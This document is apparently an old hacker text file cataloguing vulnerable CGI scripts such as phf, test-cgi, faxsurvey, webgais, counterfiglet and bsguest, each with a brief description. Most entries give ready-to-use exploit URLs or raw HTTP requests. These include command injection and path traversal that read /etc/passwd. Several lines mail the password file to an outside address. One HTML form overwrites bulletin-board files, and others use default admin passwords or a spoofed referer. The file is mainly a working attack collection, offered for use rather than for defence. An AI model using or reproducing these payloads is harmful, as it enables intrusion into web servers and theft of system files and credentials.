-<>-
PHF

A script which came as standard with the popular Apache web server, also contained a serious flaw. Incorrect parameter checks are done, and therefore literally any command you want can be executed on the system. 

Exploit:

Using the URL:

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 

will display the password file from the server. 

-<>-
Test-cgi

Anyone can remotely inventory the files on a machine. 

Exploit: 

Using the URL: /cgi-bin/test-cgi?* 

will display the contents of the servers cgi directory.

Using the URL: /cgi-bin/test-cgi?/*

will display the contents of the servers root directory.

Both listings will be displayed via the QUERY_STRING field, however, it is also possible to get listings via the CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, and (with the help of rDNS) the REMOTE_HOST field. 

For example, to get a listing of the root directory via the SERVER_PROTOCOL field, you would telnet to the server on port 80 and use:

GET /cgi-bin/test-cgi?x> /*

-<>-
Fax Survey

If the HylaFAX package is installed (common on some older Linux distributions), you can send arbitrary commands running as the UID of the web server: 

Exploit:

/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

The above example URL could expose the passwd file of the server.

-<>-
Dump

This program, written in perl, displays general environment information about the system on which a Web server resides. This information may include the version of Web server software being used, path information and information about the system's directory settings. 

-<>-
Handler

A small perl program that allows (in theory) to read and download files under the system's root directory. In fact it allows you to execute any command remotely on the target machine. 

Exploit: 

GET /cgi-bin/handler/useless_stuff;cat /etc/passwd| ?data=Download 

Telneting to the server on port 80 and typing the above will give you the servers password file. 

-<>-
Netauth

Netauth is a web based email management system for Windows NT and most Unix platforms. This product contains a security hole that enables remote users to download local files, including files like /etc/shadow.

Exploit:

http://www.example.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

The above url would retrieve the passwd file from the server. 

-<>-
Calender.pl

The vulnerability allows remote users to execute arbitrary commands on the web server with the privileges of the httpd process. 

The calender_admin.pl script prompts the user for a configuration file to modify, and then in an attempt to authenticate the user, it passes the user input straight to perl open(). This can be easily exploited to execute arbitrary commands remotely. 

Exploit:

http://www.example.com/cgi-bin/calender_admin.pl 

Going to that URL will result in a username/password/configuration file input fields. Ignoring username and password, enter: 

|<command here>| 
(With the pipes) in the configuration file field. 

For example: 
|ping 127.0.0.1| 

and the command will be executed.

-<>-
HTML Script

Htmlscript has a vulnerability in it which allows you to access system files, presumably any file the web server user can access.

Exploit:

http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd

The above url would get the passwd file from the server.

-<>-
wwwboard.pl

There is no input checking done on the list of articles which a given article is a followup to.  This allows us to give it invalid input such that we can clobber files that the web server has write permissions to.

For example, this HTML snippit, when read by Netscape (and the button is pushed), will clobber articles 1 to 5 on the wwwboard at some.poor.host.

<form method=POST action="http://some.poor.host/cgi-bin/wwwboard.pl">
<input type=hidden name="followup" value="1,2,3,4,5,|.|">
<input type=submit value="Clobber web board">
</form>

-<>-
Finger

Get a list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@acme.net", and that your email address is  "your@email.org")

Go to the finger box, and type this in (changing these email addresses for the real ones):

kangaroo@acme.net ; /bin/mail your@email.org < etc/passwd

This takes the passwd file through kangaroo@acme.net and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.

-<>-
bnbform.cgi

BNBForm is a form processing cgi by BigNoseBird. The problem is that this form sends a responding email to users with the contents of any file contained in the 'automessage' variable. This can be used to specify any file that is readable by the uid of the webserver.

Exploit:

The exploit is an html form, but was too large to include here. Please search for "bnbform exploit" at a good search engine to get the code.
 
-<>-
survey.cgi

BNBSurvey is a CGI for doing simple surveys. This script has 2 modes of operation - the first being that people can vote as many times as they like, and the second being that the people can only vote once every hour. The first operation is the default.

If this second mode of operation is enabled though, remote users can use metacharacters in the 'filebase' variable to execute arbitrary commands. (ie. if $ENFORCEMENT = "1" is set in the cgi script).

Exploit:

This exploit code was too large to include, please search for "bnbsurvey exploit" at a good search engine.

-<>-
classifieds.cgi

Classifieds is a free cgi script for handling classified ads. There are multiple security holes in this that allow remote execution. Firstly, by setting your email address as something like "duke@viper.net.au</etc/passwd" you can read files remotely off the server. 

Also, by setting the hidden variables on a html form, a remote user can force arbitary commands to be executed. One example of this is modifying the following variable:

<input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Changing its value to another command will cause that alternate command to be executed.

-<>-
textcounter.pl

Textcounter allows anybody to execute commands on your system with the same rights as the httpd daemon.

-<>-
Count.cgi

There are at least two buffer overflow vulnerabilities in wwwcount, a widely used CGI web counter. The most harmful occurs when the QUERY_STRING environment variable (which reflects the url asked by the www client) is copied to a fixed-size dynamic buffer. Another one occures only when the counter is compiled with a special authentication option, and may not be exploitable.

-<>-
WebGais

WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "webgais" and does the actual interfacing with the search tool.

It reads the query from a user form, and then runs the GAIS search engine for that query. The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse). 

Exploit:

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

-<>-
Web Sendmail

Websendmail is a cgi-bin that comes with the WEBgais package, which is an interface to the GAIS search tool. It is a PERL script that reads input from a form and sends e-mail to the specified destination.

Exploit:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

-<>-
CGI Counter

The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server, but other exploits can be used to get root access on an unpatched OS. 

Exploit: 

Using straight URL 
http://www.example.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id 
(This will display the uname of a given system) 

Passing commands in a variable: 
$ telnet www.example.com www 
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0 
X: pwd;ls -la /etc;cat /etc/passwd 

$ telnet www.example.com www 
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0 
X: echo;id;uname -a;w 

-<>-
SGI infosrch

The Infosearch subsystem is used to search and browse virtually all SGI  on-line documentation. A vulnerability has been discovered in infosrch.cgi  which could allow any remote user to view files on the vulnerable system with privileges of the user "nobody". 

-<>-
Poll It

Poll It allows easy hosting of online polls on websites. However this CGI also enables remote attackers to read any world readable file on the server.

Exploit:

/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00

The above URL would retrieve the passwd file from the server.

-<>-
Robpoll

Robpoll is a free cgi based admin program. 

Exploit:

First go to:

http://www.example.com/cgi-bin/robpoll.cgi?Admin

You will have an option to change the password. The password by default is "robpoll", leaving this password thus compromises the system and its files.  

-<>-
WebBanner

A security hole in the WebBanner CGI enables remote attackers to view certain files on the system, and possibily execute system commands as well. 

Exploit: 

http://www.example.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd 

The above URL will retrieve the passwd file from the server.

-<>-
WebWho+

WebWho+ is a free cgi script for executing whois queries via the www. Though it does perform checks for shell escape characters on some parameters, it misses the 'type' variable and allows for malicious input to be sent to a shell. It is possible to execute arbitrary commands on a webserver running WebWho+ v1.1 with the uid of the webserver (usually nobody).

-<>-
SWC

Swc implements a simple web counter. It is meant to support those "this page has been visited xxx times" sentences at the bottom of many web pages, through a CGI interface. The mentioned product contains a remotely exploitable buffer overflow that enables remote attackers to execute code on the server.

Exploit:

Simple Web Counter contains an exploitable buffer overflow when it parses the ctr= parameter. If this parameter is provided with a large enough buffer, it will cause the CGI to overflow one of its variables, enabling the execution of arbitrary code. 

-<>-
News.cgi

The problem allows people to add an author into the 'authors.file' file. This can't be done through a web browser since the script assumes that if the HTTP_REFERER field is the url of the news.cgi script (the main script) then you must have completed the login process :). This assumtion would be true if you were to use a browser but.... its easily fixed.

Exploit:

Using netcat to make a raw HTTP request:

POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: n30/browser
Host: www.speedy3d.com
Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71

author=n30&apassword=teapot&email=don@know.com&name=n30&password=teapot

it is possible to add an author.

-<>-
Ralfs chat cgi

The CGI contains a default master password (which is set by default to: mpw), if this password is provided by an unprivileged user, all moderator/operator rights will be given to him or her. 

Exploit:

Due to bad privileges settings a remote attacker can read the config.pm file, which among other things contains the master password. 

E.G:

http://www.example.com/cgi-bin/config.pm 

Also, by accessing: http://www.example.com/cgi-bin/data/nicks you can view all the nicknames and passwords etc.

-<>-
Sambar

Sambar Server search CGI vulnerability occurs in the search.dll Sambar ISAPI Search shipped with this product. This dynamic link loader does not check on the 'query' parameter that is parsed to the server, therefore by constructing a malformed URL we are able to view the contents of the server, all folders, and files.

Exploit:

All that is needed is a malformed query parameter parsed to the search.dll file.

http://server-running-sambar.com/search.dll?search?query=%00&logic=AND

.. this will reveal the current working directory contents.

http://server-running-sambar.com/search.dll?search?query=/&logic=AND 

.. this will reveal the root dir of the server.

-<>-
Whois.cgi

There is a metacharacter bug in the script that means only the ; character is removed by the checking. This means you can still use pipes and redirection characters etc.

Exploit:

They would be limitless, typically something like:

microsoft.com|cat /etc/passwd

would retrieve the password file from the server.

-<>-
EZshopper

EZshopper 3.0 and 2.0 contain some Perl scripts, including a CGI program called loadpage.cgi that is used to open and show HTML files under EZshopper's directory. However, no checking is performed properly - and therefore you can view the contents of the EZShopper directory, and its sub directories.

Exploit:

To view the contents of the root directory:

EZshopper v3.0: 
http://example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/ 

EZshopper v2.0: 
http://example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/

To view file list of EZshopper subdirectory: 

EZshopper v3.0: 
http://example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/subdirectory/ 

EZshopper v2.0: 
http://example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/subdirectory/

Once an attacker is able to get the list, he can use the following URL to view the content of arbitrary files: 

EZshopper v3.0: 
http://example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=<id>&file=/<directory>/<filename> 

EZshopper v2.0: 
http://example.com/cgi-bin/ezshopper2/loadpage.cgi?<id>+/<directory>/<filename> 

-<>-
Technote

Technote 2000 is a well-known Korean CGI board. A security vulnerability in the product allows remote attackers to view arbitrary files, and possibly also execute arbitrary commands.

Exploit:

File viewing:
 
By accessing the following URL the file /etc/passwd will be sent back to the user: 
http://www.example.com/technote/print.cgi?board=../../../../../../../../etc/passwd%00 

File downloading:
 
By accessing the following URL the file /../../../main.cgi will be downloaded (not viewed) by the user: 
http://www.example.com/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi 

-<>-
bsguest.cgi

BSGuest does not filter out ; resulting in the ability for anyone to execute commands on the server. 

Exploit:

The attacker just enters his email address as:

hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd

and then the server mails a confirmation letter along with the passwd file to the attacker. 

-<>-
bslist.cgi

BSList doesn't filter out ; allowing anyone to execute commands on the server. 

Exploit:

This can be exploited by signing up for the mailing list with the email address of:

hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd

-<>-
Guestserver

Guestserver, a guestbook system, is vulnerable to a remote command execution bug. This bug is caused by incomplete sanitation of the email variable from the http POST. 

Exploit:

The | (pipe) character is not filtered! We can therefore construct an email variable with commands delimited by |'s and the CGI will happily execute these commands if it looks like a "normal" email address. An example email variable that would execute "bleh" on remote server (check error_log): "| bleh | bob@example.com". This would result in the execution of "/bin/sh -c | bleh | bob@example.com" on the remote server. If you look in apache's error_log you will see the following entry: 

sh: bleh: command not found 
sh: bob@example.com: command not found 

-<>-
WebPage

The WebPage Replicator script exposes several environment variables. Any remote attacker can view this information by providing a special URL. Webpage.cgi dumps useful information such as script location, HTTP root, version of Perl, server_admin, server_name, and path to the browser when the database file provided is incorrect. 

Exploit:

If site does not contain a file named ukr.htm the following URL displays the environment dump: 

http://www.example.com/cgi-bin/replicator/webpage.cgi/313373/ukr.htm 

-<>-
Thinking Arts Store

Thinking Arts E-Commerce package comes with a web store front-end called store.cgi which allows people to basically order products on their website over a SQL database. A security vulnerability in the product allows remote attackers to download content outside the normal web root. 

Exploit:

Adding the string "/../" to an URL allows an attacker to view any file on the server, and also list directories within the server which the owner of the vulnerable HTTPd has permissions to access. Remote execution of commands does not appear to be possible with this directory traversal bug, but directory listing is. Please note that you do need the %00.html at the end of your command. 

http://www.example.com/cgi-bin/store.cgi?StartID=../../../../../etc/hosts%00.html 

http://www.example.com/cgi-bin/store.cgi?StartID=../../../../../etc/%00.html 

-<>-
WebSPIRS

WebSPIRS is SilverPlatter's Information Retrieval System for the World Wide Web (WWW). It is a common gateway interface (CGI) application that allows any forms-capable browser, such as Netscape, to search SilverPlatter (SP) Electronic Reference Library (ERL) databases available over the Internet. A security vulnerability in the CGI allows remote attacker to view any locally available file (mainly word-readable files). 

Exploit:

webspirs.cgi?sp.nextform=../../../../../../path/to/file 

-<>-
ASPSeek

ASPSeek is an open source search engine software developed by SWsoft. 
Several buffer overflow vulnerabilities enable remote attackers to execute code on the web server remotely, with the privileges of the web server. 

Exploit:

Code to large to include here. Check a vulnerability search engine for more information.

-<>-
TalkBack

TalkBack gives users an opportunity to air their views in a section on a website. A security vulnerability in the program allows remote users (website visitors) to view any world-readable file on a webserver (If webserver is running on a higher user than nobody or equivalent, then additional files can be accessed). 

Exploit:

The following url would show the passwd file from the server:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 

The following url will show the source to the cgi (which has the admin password in:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1

If you find the admin pass in the source, you can then go to:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin 

and add/delete posts.

-<>-
CrazyWWWBoard

CrazyWWWBoard is a web bulletin board program written in C. A security vulnerability in the bulletin board allows execution of arbitrary code with the web servers security privileges.

Exploit:

The source code to the exploit is available, but too large to include here.

-<>-
Email List

The Email List Generator is a web-interfaced script that allows the visitors on your web site to leave their email address so they may be notified when you update your web site.

This script also provides the ability to create and change the message you wish to send to your list right from the web browser as well as to maintain the list being generated.

There are two parts to the script. The nph-maillist.pl file carries all the functionality for the web interface and the mailengine.pl is the workhorse that runs in the background until the entire list is emailed. A security vulnerability in the product allows remote attackers to execute any arbitrary commands they want to. 

Exploit:

The source code to the exploit is available, but too large to include here.

-<>-
DCForum

DCForum is a popular CGI to create message boards on web sites. It is vulnerable to an attack which will grant a remote attacker the status of DCForum administrator, which can then be used to execute arbitrary commands on the server. This works because the forum signup does not validate the input correctly. Therefore, by registering with a last name containing url-encoded newlines and pipes, an attacker can imbed a second line into his last name, which will be recorded as an entirely new line in the password file, containing whatever information the attacker wants. This means that an attacker can add his very own admin account straight into the password file.

Exploit:

The exploit is very simple, but I have not included it here. You will need to go and find the advisory for this exploit off the net. There is also a perl script to automate the hack.

-<>-
viewsrc.cgi

viewsrc.cgi v2.0 is a source-code viewing CGI script. A vulnerability exists which allows a remote user to view any file on the server.

Exploit:

The following url demonstrates how you could get any file from the server:

http://localhost/cgi-bin/viewsrc.cgi?loc=../<any file!>

-<>--<>-